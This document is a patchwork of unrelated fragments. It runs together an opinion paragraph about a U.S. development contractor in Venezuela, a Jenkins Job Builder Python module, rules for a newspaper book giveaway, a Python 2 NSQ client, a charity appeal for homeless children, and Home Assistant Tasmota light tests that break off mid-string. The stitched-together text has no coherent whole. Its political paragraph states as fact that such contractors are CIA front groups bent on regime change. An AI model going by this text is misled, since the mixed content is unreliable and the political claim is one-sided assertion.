is one of the largest U.S. government contractors in the world. The company, with headquarters in Bethesda, MD, presently has a $50 million contract with USAID for operations in Afghanistan. In Latin America, DAI has operations and field offices in Bolivia, Brazil, Colombia, Cuba, Ecuador, El Salvador, Guatemala, Haiti, Honduras, Mexico, Nicaragua, Peru, Dominican Republic and Venezuela. This year, USAID/DAI's budget in Venezuela nears $15 million USD and its programs are oriented towards strengthening opposition parties, candidates and campaigns for the 2010 legislative elections. Just two weeks ago, President Chávez also denounced the illegal presence of U.S. drone planes in Venezuelan airspace. Can you imagine what kind of Holy Hell-Fire there would be in America if it were known that a foreign government was pouring millions of dollars into guiding our electoral process? It's beyond me why other countries would accept these CIA front groups. They have only one purpose: destabilization and regime change.
# Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

"""
The Logrotate section allows you to automatically remove old build
history.  It adds the ``logrotate`` attribute to the :ref:`Job`
definition.  All logrotate attributes have default "-1" value so you
don't need to specify that explicitly

Example::

  - job:
      name: test_job
      logrotate:
        daysToKeep: 3
        numToKeep: 20
        artifactDaysToKeep: -1
        artifactNumToKeep: -1

The Assigned Node section allows you to specify which Jenkins node (or
named group) should run the specified job.  It adds the ``node``
attribute to the :ref:`Job` definition.

Example::

  - job:
      name: test_job
      node: precise

That specifies that the job should be run on a Jenkins node or node
group named ``precise``.
"""

import xml.etree.ElementTree as XML
import jenkins_jobs.modules.base


class General(jenkins_jobs.modules.base.Base):
    """Emit the general (top-level) job configuration XML elements."""

    # Module ordering value; low number presumably means this module's
    # XML is generated before others — confirm in the base framework.
    sequence = 10

    def gen_xml(self, parser, xml, data):
        """Append general job settings from *data* onto the job *xml* root.

        Each recognized key in *data* becomes one or more child elements;
        unrecognized keys are ignored.  Boolean options default to 'false'
        in the generated XML when absent.
        """
        jdk = data.get('jdk', None)
        if jdk:
            XML.SubElement(xml, 'jdk').text = jdk
        XML.SubElement(xml, 'actions')
        # An explicit empty-string description is preserved, hence the
        # `is not None` check instead of truthiness.
        desc_text = data.get('description', None)
        if desc_text is not None:
            description = XML.SubElement(xml, 'description')
            description.text = desc_text
        XML.SubElement(xml, 'keepDependencies').text = 'false'
        # 'disabled' is only emitted when the key is present at all.
        disabled = data.get('disabled', None)
        if disabled is not None:
            if disabled:
                XML.SubElement(xml, 'disabled').text = 'true'
            else:
                XML.SubElement(xml, 'disabled').text = 'false'
        if 'display-name' in data:
            XML.SubElement(xml, 'displayName').text = data['display-name']
        if data.get('block-downstream'):
            XML.SubElement(xml,
                           'blockBuildWhenDownstreamBuilding').text = 'true'
        else:
            XML.SubElement(xml,
                           'blockBuildWhenDownstreamBuilding').text = 'false'
        if data.get('block-upstream'):
            XML.SubElement(xml,
                           'blockBuildWhenUpstreamBuilding').text = 'true'
        else:
            XML.SubElement(xml,
                           'blockBuildWhenUpstreamBuilding').text = 'false'
        if 'auth-token' in data:
            XML.SubElement(xml, 'authToken').text = data['auth-token']
        if data.get('concurrent'):
            XML.SubElement(xml, 'concurrentBuild').text = 'true'
        else:
            XML.SubElement(xml, 'concurrentBuild').text = 'false'
        if 'workspace' in data:
            XML.SubElement(xml, 'customWorkspace').text = \
                str(data['workspace'])
        if 'quiet-period' in data:
            XML.SubElement(xml, 'quietPeriod').text = str(data['quiet-period'])
        # Pinning to a node disables roaming; otherwise the job may run
        # on any node.
        node = data.get('node', None)
        if node:
            XML.SubElement(xml, 'assignedNode').text = node
            XML.SubElement(xml, 'canRoam').text = 'false'
        else:
            XML.SubElement(xml, 'canRoam').text = 'true'
        if 'logrotate' in data:
            lr_xml = XML.SubElement(xml, 'logRotator')
            logrotate = data['logrotate']
            # All four retention settings default to -1 (unlimited).
            lr_days = XML.SubElement(lr_xml, 'daysToKeep')
            lr_days.text = str(logrotate.get('daysToKeep', -1))
            lr_num = XML.SubElement(lr_xml, 'numToKeep')
            lr_num.text = str(logrotate.get('numToKeep', -1))
            lr_adays = XML.SubElement(lr_xml, 'artifactDaysToKeep')
            lr_adays.text = str(logrotate.get('artifactDaysToKeep', -1))
            lr_anum = XML.SubElement(lr_xml, 'artifactNumToKeep')
            lr_anum.text = str(logrotate.get('artifactNumToKeep', -1))
The House on Sunset Lake Rules: 1. Open to United Kingdom and Republic of Ireland residents aged 18 or over only, except employees of the Promoter, News Corp UK & Ireland Limited, and their associated, affiliated or subsidiary companies, their families, agents or any other person(s) connected with the competition, including third party promotional partners 2. Competition closes at 11.59pm on September 3, 2016 (the “Closing Date”). Entries received after the Closing Date will not be counted. 3. One entry per person. Bulk, automatically generated or third party entries are void. 4. To enter you must click the ‘click to enter’ link on the The House on Sunset Lake page before the Closing Date. 5. There will be ten winners 6. The winners will be selected at random from all valid entries for this competition received before the Closing Date. 7. Winners will be notified by email or phone or using the other contact details provided by the winner within fourteen days after the Closing Date. All reasonable endeavours will be made to contact the winner during the specified time. If a winner cannot be contacted or is not available, the Promoter reserves the right to re-draw another winner from the valid/correct entries that were received before the Closing Date. 8. The prize is a copy of the book, The House on Sunset Lake 10. The prize is non-transferable and there are no cash alternatives to the prize in whole or in part. 11. The promoter of this competition is News Group Newspapers Ltd (publishers of The Sun) (the “Promoter”). 12. General terms and conditions for competitions apply*.
import socket
import struct
import logging

import tornado.iostream
# NOTE(review): tornado.ioloop is used below but only tornado.iostream is
# imported; it works because importing the iostream module pulls in
# tornado.ioloop as a package attribute — confirm this stays true for the
# pinned tornado version.

import nsq


class AsyncConn(object):
    # Minimal asynchronous TCP client for the NSQ V2 protocol, built on a
    # Tornado IOStream.  This is Python 2 code (it relies on the `unicode`
    # builtin and uses print statements in the demo below).
    def __init__(self, host, port, connect_callback, data_callback, close_callback, timeout=1.0):
        """Record connection parameters and user callbacks.

        host/port        -- nsqd address to connect to
        connect_callback -- called as cb(conn) once the handshake is sent
        data_callback    -- called as cb(conn, frame_body) per received frame
        close_callback   -- called as cb(conn) when the socket closes
        timeout          -- socket timeout in seconds (must be a float)
        """
        assert isinstance(host, (str, unicode))
        assert isinstance(port, int)
        assert callable(connect_callback)
        assert callable(data_callback)
        assert callable(close_callback)
        assert isinstance(timeout, float)
        self.connecting = False
        self.connected = False
        self.host = host
        self.port = port
        self.connect_callback = connect_callback
        self.data_callback = data_callback
        self.close_callback = close_callback
        self.timeout = timeout

    def connect(self):
        """Start an asynchronous connect; no-op if already (dis)connecting."""
        if self.connected or self.connecting:
            return
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s.settimeout(self.timeout)
        self.s.setblocking(0)  # IOStream requires a non-blocking socket
        self.stream = tornado.iostream.IOStream(self.s)
        self.stream.set_close_callback(self._socket_close)
        self.connecting = True
        self.stream.connect((self.host, self.port), self._connect_callback)

    def _connect_callback(self):
        # Socket is up: send the protocol magic, arm the read loop, then
        # notify the user.  User exceptions are logged, never propagated.
        self.connecting = False
        self.connected = True
        self.stream.write(nsq.MAGIC_V2)
        self._start_read()
        try:
            self.connect_callback(self)
        except Exception:
            logging.exception("uncaught exception in connect_callback")

    def _start_read(self):
        # Every NSQ frame starts with a 4-byte big-endian length prefix.
        self.stream.read_bytes(4, self._read_size)

    def _socket_close(self):
        self.connected = False
        try:
            self.close_callback(self)
        except Exception:
            logging.exception("uncaught exception in close_callback")

    def close(self):
        self.connected = False
        self.stream.close()

    def _read_size(self, data):
        """Decode the frame length prefix and read the frame body."""
        try:
            size = struct.unpack('>l', data)[0]
            self.stream.read_bytes(size, self._read_body)
        except Exception:
            # A malformed size prefix leaves the stream unparseable.
            self.close()
            logging.exception("failed to unpack size")

    def _read_body(self, data):
        """Deliver one frame body to the user, then re-arm the read loop."""
        try:
            self.data_callback(self, data)
        except Exception:
            logging.exception("uncaught exception in data_callback")
        # Re-arm on the next IOLoop iteration rather than recursing, so a
        # busy stream cannot starve other handlers or grow the stack.
        tornado.ioloop.IOLoop.instance().add_callback(self._start_read)

    def send(self, data):
        self.stream.write(data)

    def __str__(self):
        return self.host + ':' + str(self.port)


if __name__ == '__main__':
    # Smoke test: subscribe to topic 'test' / channel 'ch' on a local nsqd,
    # print and FIN every message, keeping RDY at 1.
    def connect_callback(c):
        print "connected"
        c.send(nsq.subscribe('test', 'ch', 'a', 'b'))
        c.send(nsq.ready(1))

    def close_callback(c):
        print "connection closed"

    def data_callback(c, data):
        unpacked = nsq.unpack_response(data)
        if unpacked[0] == nsq.FRAME_TYPE_MESSAGE:
            c.send(nsq.ready(1))
            msg = nsq.decode_message(unpacked[1])
            print msg.id, msg.body
            c.send(nsq.finish(msg.id))

    c = AsyncConn("127.0.0.1", 4150, connect_callback, data_callback, close_callback)
    c.connect()
    tornado.ioloop.IOLoop.instance().start()
Children who experience childhood stress, including homelessness, are likely to struggle in school, have behavior issues, and be at higher risk of increased illnesses and emotional problems. As adults, these same children are more likely to have health challenges, engage in risky behavior, and be unemployed or underemployed. The Campaign to End Child Homelessness works to ensure that each child at SAMMinistries’ Transitional Living and Learning Center can achieve his or her full potential. By providing focused, personalized support in a comprehensive, holistic, and integrated manner, every child has the opportunity to succeed. The Campaign to End Child Homelessness affords these at-risk children a window of opportunity that cannot be missed! Your gift of $30 provides safe, secure shelter for a child for one night. Your gift of $182 provides one month of education and enrichment that helps build the foundation a child needs to break the cycle of homelessness. Your gift of $346 provides one month of healthcare access and wellness interventions that support growth and development. It costs $11,000 per year to holistically help a child overcome homelessness. Fill out the form below and become an important part of the lives of the 150 children who call the Transitional Living and Learning Center “home” each year.
"""The tests for the Tasmota light platform.""" import copy import json from hatasmota.const import CONF_MAC from hatasmota.utils import ( get_topic_stat_result, get_topic_tele_state, get_topic_tele_will, ) from homeassistant.components import light from homeassistant.components.light import ( SUPPORT_BRIGHTNESS, SUPPORT_COLOR, SUPPORT_COLOR_TEMP, SUPPORT_EFFECT, SUPPORT_TRANSITION, SUPPORT_WHITE_VALUE, ) from homeassistant.components.tasmota.const import DEFAULT_PREFIX from homeassistant.const import ATTR_ASSUMED_STATE, STATE_OFF, STATE_ON from .test_common import ( DEFAULT_CONFIG, help_test_availability, help_test_availability_discovery_update, help_test_availability_poll_state, help_test_availability_when_connection_lost, help_test_discovery_device_remove, help_test_discovery_removal, help_test_discovery_update_unchanged, help_test_entity_id_update_discovery_update, help_test_entity_id_update_subscriptions, ) from tests.async_mock import patch from tests.common import async_fire_mqtt_message from tests.components.light import common async def test_attributes_on_off(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 1 config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") is None assert state.attributes.get("min_mireds") is None assert state.attributes.get("max_mireds") is None assert state.attributes.get("supported_features") == 0 async def test_attributes_dimmer(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 
channel light (dimmer) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") is None assert state.attributes.get("min_mireds") is None assert state.attributes.get("max_mireds") is None assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION ) async def test_attributes_ct(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 2 # 2 channel light (CW) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") is None assert state.attributes.get("min_mireds") == 153 assert state.attributes.get("max_mireds") == 500 assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP | SUPPORT_TRANSITION ) async def test_attributes_ct_reduced(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 2 # 2 channel light (CW) config["so"]["82"] = 1 # Reduced CT range mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") 
is None assert state.attributes.get("min_mireds") == 200 assert state.attributes.get("max_mireds") == 380 assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP | SUPPORT_TRANSITION ) async def test_attributes_rgb(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 3 # 3 channel light (RGB) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") == [ "None", "Wake up", "Cycle up", "Cycle down", "Random", ] assert state.attributes.get("min_mireds") is None assert state.attributes.get("max_mireds") is None assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_COLOR | SUPPORT_EFFECT | SUPPORT_TRANSITION ) async def test_attributes_rgbw(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 4 # 5 channel light (RGBW) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") == [ "None", "Wake up", "Cycle up", "Cycle down", "Random", ] assert state.attributes.get("min_mireds") is None assert state.attributes.get("max_mireds") is None assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_COLOR | SUPPORT_EFFECT | SUPPORT_TRANSITION | SUPPORT_WHITE_VALUE ) async def 
test_attributes_rgbww(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 5 # 5 channel light (RGBCW) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") == [ "None", "Wake up", "Cycle up", "Cycle down", "Random", ] assert state.attributes.get("min_mireds") == 153 assert state.attributes.get("max_mireds") == 500 assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_COLOR | SUPPORT_COLOR_TEMP | SUPPORT_EFFECT | SUPPORT_TRANSITION | SUPPORT_WHITE_VALUE ) async def test_attributes_rgbww_reduced(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 5 # 5 channel light (RGBCW) config["so"]["82"] = 1 # Reduced CT range mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") == [ "None", "Wake up", "Cycle up", "Cycle down", "Random", ] assert state.attributes.get("min_mireds") == 200 assert state.attributes.get("max_mireds") == 380 assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_COLOR | SUPPORT_COLOR_TEMP | SUPPORT_EFFECT | SUPPORT_TRANSITION | SUPPORT_WHITE_VALUE ) async def test_controlling_state_via_mqtt_on_off(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = 
copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 1 config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() state = hass.states.get("light.test") assert state.state == "unavailable" assert not state.attributes.get(ATTR_ASSUMED_STATE) async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") state = hass.states.get("light.test") assert state.state == STATE_OFF assert not state.attributes.get(ATTR_ASSUMED_STATE) async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.state == STATE_ON async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"OFF"}') state = hass.states.get("light.test") assert state.state == STATE_OFF async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.state == STATE_ON async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"OFF"}') state = hass.states.get("light.test") assert state.state == STATE_OFF async def test_controlling_state_via_mqtt_ct(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 2 # 2 channel light (CT) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() state = hass.states.get("light.test") assert state.state == "unavailable" assert not state.attributes.get(ATTR_ASSUMED_STATE) async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") state = hass.states.get("light.test") assert state.state == STATE_OFF assert not state.attributes.get(ATTR_ASSUMED_STATE) async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.state == STATE_ON 
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"OFF"}') state = hass.states.get("light.test") assert state.state == STATE_OFF async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Dimmer":50}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("brightness") == 127.5 async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","CT":300}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("color_temp") == 300 # Tasmota will send "Color" also for CT light, this should be ignored async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Color":"255,128"}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("color_temp") == 300 assert state.attributes.get("brightness") == 127.5 async def test_controlling_state_via_mqtt_rgbww(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 5 # 5 channel light (RGBCW) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() state = hass.states.get("light.test") assert state.state == "unavailable" assert not state.attributes.get(ATTR_ASSUMED_STATE) async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") state = hass.states.get("light.test") assert state.state == STATE_OFF assert not state.attributes.get(ATTR_ASSUMED_STATE) async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.state == STATE_ON async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"OFF"}') state = hass.states.get("light.test") assert state.state == STATE_OFF async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Dimmer":50}' ) state = 
hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("brightness") == 127.5 async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Color":"255,128,0"}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("rgb_color") == (255, 128, 0) async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","White":50}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("white_value") == 127.5 # Setting white > 0 should clear the color assert not state.attributes.get("rgb_color") async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","CT":300}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("color_temp") == 300 async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","White":0}' ) state = hass.states.get("light.test") assert state.state == STATE_ON # Setting white to 0 should clear the white_value and color_temp assert not state.attributes.get("white_value") assert not state.attributes.get("color_temp") async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Scheme":3}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("effect") == "Cycle down" async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.state == STATE_ON async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"OFF"}') state = hass.states.get("light.test") assert state.state == STATE_OFF async def test_sending_mqtt_commands_on_off(hass, mqtt_mock, setup_tasmota): """Test the sending MQTT commands.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 1 config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", 
json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") state = hass.states.get("light.test") assert state.state == STATE_OFF await hass.async_block_till_done() await hass.async_block_till_done() mqtt_mock.async_publish.reset_mock() # Turn the light on and verify MQTT message is sent await common.async_turn_on(hass, "light.test") mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Power1", "ON", 0, False ) mqtt_mock.async_publish.reset_mock() # Tasmota is not optimistic, the state should still be off state = hass.states.get("light.test") assert state.state == STATE_OFF # Turn the light off and verify MQTT message is sent await common.async_turn_off(hass, "light.test") mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Power1", "OFF", 0, False ) mqtt_mock.async_publish.reset_mock() async def test_sending_mqtt_commands_rgbww(hass, mqtt_mock, setup_tasmota): """Test the sending MQTT commands.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 5 # 5 channel light (RGBCW) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") state = hass.states.get("light.test") assert state.state == STATE_OFF await hass.async_block_till_done() await hass.async_block_till_done() mqtt_mock.async_publish.reset_mock() # Turn the light on and verify MQTT message is sent await common.async_turn_on(hass, "light.test") mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON", 0, False ) mqtt_mock.async_publish.reset_mock() # Tasmota is not optimistic, the state should still be off state = hass.states.get("light.test") assert state.state == STATE_OFF # Turn the light off and verify MQTT message is sent await common.async_turn_off(hass, "light.test") 
mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 OFF", 0, False ) mqtt_mock.async_publish.reset_mock() # Turn the light on and verify MQTT messages are sent await common.async_turn_on(hass, "light.test", brightness=192) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Dimmer 75", 0, False ) mqtt_mock.async_publish.reset_mock() await common.async_turn_on(hass, "light.test", rgb_color=[255, 128, 0]) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;Color2 255,128,0", 0, False, ) mqtt_mock.async_publish.reset_mock() await common.async_turn_on(hass, "light.test", color_temp=200) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;CT 200", 0, False, ) mqtt_mock.async_publish.reset_mock() await common.async_turn_on(hass, "light.test", white_value=128) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;White 50", 0, False, ) mqtt_mock.async_publish.reset_mock() await common.async_turn_on(hass, "light.test", effect="Random") mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;Scheme 4", 0, False, ) mqtt_mock.async_publish.reset_mock() async def test_sending_mqtt_commands_power_unlinked(hass, mqtt_mock, setup_tasmota): """Test the sending MQTT commands to a light with unlinked dimlevel and power.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (dimmer) config["so"]["20"] = 1 # Update of Dimmer/Color/CT without turning power on mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", 
"Online") state = hass.states.get("light.test") assert state.state == STATE_OFF await hass.async_block_till_done() await hass.async_block_till_done() mqtt_mock.async_publish.reset_mock() # Turn the light on and verify MQTT message is sent await common.async_turn_on(hass, "light.test") mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON", 0, False ) mqtt_mock.async_publish.reset_mock() # Tasmota is not optimistic, the state should still be off state = hass.states.get("light.test") assert state.state == STATE_OFF # Turn the light off and verify MQTT message is sent await common.async_turn_off(hass, "light.test") mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 OFF", 0, False ) mqtt_mock.async_publish.reset_mock() # Turn the light on and verify MQTT messages are sent; POWER should be sent await common.async_turn_on(hass, "light.test", brightness=192) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Dimmer 75;NoDelay;Power1 ON", 0, False, ) mqtt_mock.async_publish.reset_mock() async def test_transition(hass, mqtt_mock, setup_tasmota): """Test transition commands.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 5 # 5 channel light (RGBCW) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") state = hass.states.get("light.test") assert state.state == STATE_OFF await hass.async_block_till_done() await hass.async_block_till_done() mqtt_mock.async_publish.reset_mock() # Dim the light from 0->100: Speed should be 4*2=8 await common.async_turn_on(hass, "light.test", brightness=255, transition=4) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 1;NoDelay;Speed 
